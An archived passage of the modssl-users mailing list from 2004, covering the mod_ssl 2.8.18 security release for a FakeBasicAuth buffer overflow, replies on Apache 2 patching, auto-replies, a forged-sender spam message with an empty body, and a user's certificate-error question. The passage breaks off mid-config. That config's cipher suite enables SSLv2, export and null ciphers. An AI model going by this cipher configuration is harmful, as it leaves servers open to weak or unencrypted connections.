Date: Thu, 27 May 2004 14:49:35 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
Message-ID: <20040527124935.GA95692@engelschall.com>
References: <20040512132456.GA80566@engelschall.com> <20040515001832.75512.qmail@web50209.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20040515001832.75512.qmail@web50209.mail.yahoo.com>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, May 14, 2004, a k wrote:

> Did you add my eintr fix ?
> [...]

Ops, I seem to have overlooked this.
I'll include this into mod_ssl 2.8.18.
Thanks.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 15:21:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4466EA8A69; Thu, 27 May 2004 15:21:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP
	id 8D99CA895E; Thu, 27 May 2004 15:21:58 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7C2F04CE67A; Thu, 27 May 2004 15:21:58 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 240082862A; Thu, 27 May 2004 15:21:38 +0200 (CEST)
Date: Thu, 27 May 2004 15:21:37 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.18
Message-ID: <20040527132137.GA88148@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A security issue was discovered.
It is now fixed with mod_ssl 2.8.18.
Please upgrade your installations ASAP.

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.18 (11-May-2004 to 27-May-2004)

   *) Fix buffer overflow in "SSLOptions +FakeBasicAuth" implementation
      if the Subject-DN in the client certificate exceeds 6KB in length.
      (CVE CAN-2004-0488).

   *) Handle the case of OpenSSL retry requests after interrupted system
      calls during the SSL handshake phase.

   *) Remove some unused functions.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 15:24:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 06C68A8974; Thu, 27 May 2004 15:24:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id BE7C7A8939
	for ; Thu, 27 May 2004 15:24:25 +0200 (CEST)
Date: Thu, 27 May 2004 14:20:46 +0000
From: a.moon@mdx.ac.uk
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
To: modssl-users@modssl.org
Message-id: <1DC90614DD8@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.20
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on paternity leave for the next few days.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 15:38:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 77BC6A895E; Thu, 27 May 2004 15:38:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail05.talkactive.net (mail05.talkactive.net [195.128.174.75])
	by master.modssl.org (Postfix) with SMTP id F411BA8974
	for ; Thu, 27 May 2004 15:38:03 +0200 (CEST)
Received: (qmail 90371 invoked from network); 27 May 2004 13:37:26 -0000
Received: from unknown (HELO martinmobile) (129.142.202.34)
  by mail05.talkactive.net with SMTP; 27 May 2004 13:37:26 -0000
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
References: <20040512132456.GA80566@engelschall.com> <20040515001832.75512.qmail@web50209.mail.yahoo.com> <20040527124935.GA95692@engelschall.com>
Message-ID: 
From: "Martin Nyberg" 
Content-Type: text/plain; format=flowed; delsp=yes; charset=iso-8859-15
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Date: Thu, 27 May 2004 15:37:28 +0200
In-Reply-To: <20040527124935.GA95692@engelschall.com>
User-Agent: Opera M2/7.50 (Win32, build 3778)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Nyberg" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

test

On Thu, 27 May 2004 14:49:35 +0200, Ralf S. Engelschall  
 wrote:

> On Fri, May 14, 2004, a k wrote:
>
>> Did you add my eintr fix ?
>> [...]
>
> Ops, I seem to have overlooked this.
> I'll include this into mod_ssl 2.8.18.
> Thanks.
>
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



-- 
Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 17:03:12 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CDCA8A8982; Thu, 27 May 2004 17:03:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from thoth.sbs.de (thoth.sbs.de [192.35.17.2])
	by master.modssl.org (Postfix) with ESMTP id 80372A8933
	for ; Thu, 27 May 2004 17:02:56 +0200 (CEST)
Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14])
	by thoth.sbs.de (8.11.7/8.11.7) with ESMTP id i4RF2oh13418
	for ; Thu, 27 May 2004 17:02:50 +0200 (MEST)
Received: from mars.cert.siemens.com (ust.mchp.siemens.de [139.23.201.17])
	by mail1.siemens.de (8.11.7/8.11.7) with ESMTP id i4RF2ng25782
	for ; Thu, 27 May 2004 17:02:50 +0200 (MEST)
Received: from alaska.cert.siemens.com (alaska.cert.siemens.com [139.23.202.134])
	by mars.cert.siemens.com (8.12.11/8.12.11/$SiemensCERT: mail/cert.mc.pre,v 1.59 2004/05/09 09:01:44 ust Exp $) with ESMTP id i4RF2oN1012378
	for ; Thu, 27 May 2004 17:02:50 +0200 (CEST)
Received: from alaska.cert.siemens.com (alaska.cert.siemens.de [127.0.0.1])
	by alaska.cert.siemens.com (8.12.11/8.12.11/$Ust: hosts/alaska/mail/config.mc,v 1.17 2004/05/08 20:26:28 ust Exp $) with ESMTP id i4RF2oMj045665
	for ; Thu, 27 May 2004 17:02:50 +0200 (CEST)
	(envelope-from ust@alaska.cert.siemens.com)
Received: (from ust@localhost)
	by alaska.cert.siemens.com (8.12.11/8.12.11/$Ust: hosts/alaska/mail/submit.mc,v 1.4 2002/12/31 15:32:17 ust Exp $) id i4RF2odJ031979
	for modssl-users@modssl.org; Thu, 27 May 2004 17:02:50 +0200 (CEST)
	(envelope-from ust)
Date: Thu, 27 May 2004 17:02:50 +0200
From: Udo Schweigert 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.18
Message-ID: <20040527150250.GA84009@alaska.cert.siemens.com>
References: <20040527132137.GA88148@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <20040527132137.GA88148@engelschall.com>
X-Operating-System: FreeBSD 4.10-STABLE
User-Agent: Mutt/1.5.6i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Udo Schweigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, May 27, 2004 at 15:21:37 +0200, Ralf S. Engelschall wrote:
>   Changes with mod_ssl 2.8.18 (11-May-2004 to 27-May-2004)
> 
>    *) Fix buffer overflow in "SSLOptions +FakeBasicAuth" implementation
>       if the Subject-DN in the client certificate exceeds 6KB in length.
>       (CVE CAN-2004-0488).
> 

Is that also an issue in apache-2.x? (I wasn't able to find that CVE, so I
ask here ;-)

Best regards

Udo
--
Udo Schweigert, Siemens AG   | Voice      : +49 89 636 42170
CT IC CERT, Siemens CERT     | Fax        : +49 89 636 41166
D-81730 München / Germany    | email      : Udo.Schweigert@siemens.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 17:14:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F1CE3A8982; Thu, 27 May 2004 17:14:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 5BE8EA8974
	for ; Thu, 27 May 2004 17:13:50 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id i4RFDfQ9027257
	for ; Thu, 27 May 2004 17:13:41 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i4RFDalh001250
	for ; Thu, 27 May 2004 17:13:41 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: [ANNOUNCE] mod_ssl 2.8.18
Date: Thu, 27 May 2004 17:09:17 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: [ANNOUNCE] mod_ssl 2.8.18
Thread-Index: AcRD++VpsOYI2gAuQGultI7hhDzBtQAADVsg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Udo Schweigert [mailto:Udo.Schweigert@siemens.com]
> Sent: Donnerstag, 27. Mai 2004 17:03
> To: modssl-users@modssl.org
> Subject: Re: [ANNOUNCE] mod_ssl 2.8.18
>=20
>=20
> On Thu, May 27, 2004 at 15:21:37 +0200, Ralf S. Engelschall wrote:
> >   Changes with mod_ssl 2.8.18 (11-May-2004 to 27-May-2004)
> >=20
> >    *) Fix buffer overflow in "SSLOptions +FakeBasicAuth"=20
> implementation
> >       if the Subject-DN in the client certificate exceeds=20
> 6KB in length.
> >       (CVE CAN-2004-0488).
> >=20
>=20
> Is that also an issue in apache-2.x? (I wasn't able to find=20
> that CVE, so I
> ask here ;-)

The problem was originally identified on apache2 (see
http://www.securityfocus.com/bid/10355/) and it has already been patched
there.=20

Incidentally, AFAIK there is no vulnerability unless you are using
"SSLOptions FakeBasicAuth". It's a fairly specialised option so my
feeling is that this doesn't urgently affect a whole lot of people... Of
course, you should still upgrade just in case some time in the future
you do switch that option on.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>=20
> Best regards
>=20
> Udo
> --
> Udo Schweigert, Siemens AG   | Voice      : +49 89 636 42170
> CT IC CERT, Siemens CERT     | Fax        : +49 89 636 41166
> D-81730 M=FCnchen / Germany    | email      : =
Udo.Schweigert@siemens.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 27 18:21:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9799FA895E; Thu, 27 May 2004 18:21:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id AA247A8939
	for ; Thu, 27 May 2004 18:21:18 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i4RGL9i5015664
	for ; Thu, 27 May 2004 12:21:09 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i4RGL9024676
	for ; Thu, 27 May 2004 12:21:09 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i4RGL8Mi018420
	for ; Thu, 27 May 2004 17:21:08 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i4RGL7lP018419
	for modssl-users@modssl.org; Thu, 27 May 2004 17:21:07 +0100
Date: Thu, 27 May 2004 17:21:07 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.18
Message-ID: <20040527162107.GA18411@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, May 27, 2004 at 05:09:17PM +0200, Boyle Owen wrote:
> > On Thu, May 27, 2004 at 15:21:37 +0200, Ralf S. Engelschall wrote:
> > >   Changes with mod_ssl 2.8.18 (11-May-2004 to 27-May-2004)
> > > 
> > >    *) Fix buffer overflow in "SSLOptions +FakeBasicAuth" 
> > implementation
> > >       if the Subject-DN in the client certificate exceeds 
> > 6KB in length.
> > >       (CVE CAN-2004-0488).
> > > 
> > 
> > Is that also an issue in apache-2.x? (I wasn't able to find 
> > that CVE, so I
> > ask here ;-)
> 
> The problem was originally identified on apache2 (see
> http://www.securityfocus.com/bid/10355/) and it has already been patched
> there. 

Anybody wanting to patch directly can fetch this:

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_kernel.c?r1=1.105&r2=1.106

> Incidentally, AFAIK there is no vulnerability unless you are using
> "SSLOptions FakeBasicAuth". It's a fairly specialised option so my
> feeling is that this doesn't urgently affect a whole lot of people... Of
> course, you should still upgrade just in case some time in the future
> you do switch that option on.

And furthermore, you must trust a CA who will issue a client cert with
exploit code embedded in the subject DN.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 28 02:16:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6FFBBA8982; Fri, 28 May 2004 02:16:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web50207.mail.yahoo.com (web50207.mail.yahoo.com [206.190.38.48])
	by master.modssl.org (Postfix) with SMTP id CB077A8941
	for ; Fri, 28 May 2004 02:16:41 +0200 (CEST)
Message-ID: <20040528001630.72929.qmail@web50207.mail.yahoo.com>
Received: from [80.67.64.10] by web50207.mail.yahoo.com via HTTP; Thu, 27 May 2004 17:16:30 PDT
Date: Thu, 27 May 2004 17:16:30 -0700 (PDT)
From: a k 
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
To: modssl-users@modssl.org
In-Reply-To: <20040527124935.GA95692@engelschall.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks !!

ak
--- "Ralf S. Engelschall"  wrote:
> On Fri, May 14, 2004, a k wrote:
> 
> > Did you add my eintr fix ?
> > [...]
> 
> Ops, I seem to have overlooked this.
> I'll include this into mod_ssl 2.8.18.
> Thanks.
> 
>                                        Ralf S.
> Engelschall
>                                       
> rse@engelschall.com
>                                       
> www.engelschall.com
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org



	
		
__________________________________
Do you Yahoo!?
Friends.  Fun.  Try the all-new Yahoo! Messenger.
http://messenger.yahoo.com/ 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 28 02:19:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E5B9EA895E; Fri, 28 May 2004 02:19:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 9B3B9A8982
	for ; Fri, 28 May 2004 02:19:36 +0200 (CEST)
Date: Fri, 28 May 2004 01:18:18 +0000
From: a.moon@mdx.ac.uk
Subject: Re: [ANNOUNCE] mod_ssl 2.8.17 for Apache 1.3.31
To: modssl-users@modssl.org
Message-id: <1E781886286@mdx-bg-staff1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-INTERNAL-IP: 10.13.75.20
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away on paternity leave for the next few days.  
Please contact OLSU if urgent, otherwise i will get back 
to you as soon as possible on my return.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 28 19:47:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8DC91A8982; Fri, 28 May 2004 19:47:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from thoth.sbs.de (thoth.sbs.de [192.35.17.2])
	by master.modssl.org (Postfix) with ESMTP id 5F7F6A895E
	for ; Fri, 28 May 2004 19:47:31 +0200 (CEST)
Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14])
	by thoth.sbs.de (8.11.7/8.11.7) with ESMTP id i4SHlOe13294
	for ; Fri, 28 May 2004 19:47:24 +0200 (MEST)
Received: from mars.cert.siemens.com (ust.mchp.siemens.de [139.23.201.17])
	by mail1.siemens.de (8.11.7/8.11.7) with ESMTP id i4SHlOg07721
	for ; Fri, 28 May 2004 19:47:24 +0200 (MEST)
Received: from alaska.cert.siemens.com (alaska.cert.siemens.com [139.23.202.134])
	by mars.cert.siemens.com (8.12.11/8.12.11/$SiemensCERT: mail/cert.mc.pre,v 1.59 2004/05/09 09:01:44 ust Exp $) with ESMTP id i4SHlOwf057145
	for ; Fri, 28 May 2004 19:47:24 +0200 (CEST)
Received: from alaska.cert.siemens.com (alaska.cert.siemens.de [127.0.0.1])
	by alaska.cert.siemens.com (8.12.11/8.12.11/$Ust: hosts/alaska/mail/config.mc,v 1.17 2004/05/08 20:26:28 ust Exp $) with ESMTP id i4SHlOMZ069513
	for ; Fri, 28 May 2004 19:47:24 +0200 (CEST)
	(envelope-from ust@alaska.cert.siemens.com)
Received: (from ust@localhost)
	by alaska.cert.siemens.com (8.12.11/8.12.11/$Ust: hosts/alaska/mail/submit.mc,v 1.4 2002/12/31 15:32:17 ust Exp $) id i4SHlODY027636
	for modssl-users@modssl.org; Fri, 28 May 2004 19:47:24 +0200 (CEST)
	(envelope-from ust)
Date: Fri, 28 May 2004 19:47:24 +0200
From: Udo Schweigert 
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.18
Message-ID: <20040528174724.GA25071@alaska.cert.siemens.com>
References:  <20040527162107.GA18411@redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <20040527162107.GA18411@redhat.com>
X-Operating-System: FreeBSD 4.10-STABLE
User-Agent: Mutt/1.5.6i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Udo Schweigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, May 27, 2004 at 17:21:07 +0100, Joe Orton wrote:
> On Thu, May 27, 2004 at 05:09:17PM +0200, Boyle Owen wrote:
> >> On Thu, May 27, 2004 at 15:21:37 +0200, Ralf S. Engelschall wrote:
> > >>   Changes with mod_ssl 2.8.18 (11-May-2004 to 27-May-2004)
> > >> 
> > >>    *) Fix buffer overflow in "SSLOptions +FakeBasicAuth" 
> >> implementation
> > >>       if the Subject-DN in the client certificate exceeds 
> >> 6KB in length.
> > >>       (CVE CAN-2004-0488).
> > >> 
> >> 
> >> Is that also an issue in apache-2.x? (I wasn't able to find 
> >> that CVE, so I
> >> ask here ;-)
>> 
>> The problem was originally identified on apache2 (see
>> http://www.securityfocus.com/bid/10355/) and it has already been patched
>> there. 
> 
> Anybody wanting to patch directly can fetch this:
> 
> http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/ssl_engine_kernel.c?r1=1.105&r2=1.106

Thanks, that was very helpful.


Best regards

Udo Schweigert
--
Udo Schweigert, Siemens AG   | Voice      : +49 89 636 42170
CT IC CERT, Siemens CERT     | Fax        : +49 89 636 41166
D-81730 München / Germany    | email      : Udo.Schweigert@siemens.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  2 20:08:55 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E2ED3A89E6; Wed,  2 Jun 2004 20:08:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from srv-fax.com (AMarseille-202-2-1-60.w217-128.abo.wanadoo.fr [217.128.101.60])
	by master.modssl.org (Postfix) with SMTP id ACC40A8972
	for ; Wed,  2 Jun 2004 20:08:53 +0200 (CEST)
Date: Wed, 02 Jun 2004 20:19:24 +0100
To: modssl-users@modssl.org
Subject: Hidden message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  3 18:41:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 07540A8962; Thu,  3 Jun 2004 18:41:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from shrimp.lotspeich.org (adsl-209-79-149-250.dsl.snfc21.pacbell.net [209.79.149.250])
	by master.modssl.org (Postfix) with ESMTP id 02643A893A
	for ; Thu,  3 Jun 2004 18:41:42 +0200 (CEST)
Received: from erik.cyclades.com (router.cyclades.com [64.186.161.1])
	(authenticated bits=0)
	by shrimp.lotspeich.org (8.12.11/8.12.10) with ESMTP id i53GfWxj029736
	for ; Thu, 3 Jun 2004 09:41:33 -0700
Date: Thu, 3 Jun 2004 09:43:20 -0700 (PDT)
From: Erik Lotspeich 
X-X-Sender: erik@erik.cyclades.com
To: modssl-users@modssl.org
Subject: Self-signed cert trouble - please help
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Erik Lotspeich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I've successfully made many self-signed certificates for Apache in the
past using the docs from the modssl and openssl websites.  This time, I'm
completely stumped and I've searched all over the Internet without finding
an answer that helps.  I'm getting this error message in my Apache logs:

[Thu Jun  3 09:00:11 2004] [error] OpenSSL: error:14094412:SSL 
routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint: Subject CN in 
certificate not server name or identical to CA!?]

The problem is that my cert CN is NOT identical to the CA CN and my CN
DOES match the server name.  I'm trying to access my site at
https://www.lotspeich.org/.  Here's my Apache config:


ServerAdmin erik@lotspeich.org
DocumentRoot /home/httpd/html
ServerName www.lotspeich.org
ServerAlias www lotspeich.org localhost
DirectoryIndex index.epl index.shtml index.html

#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

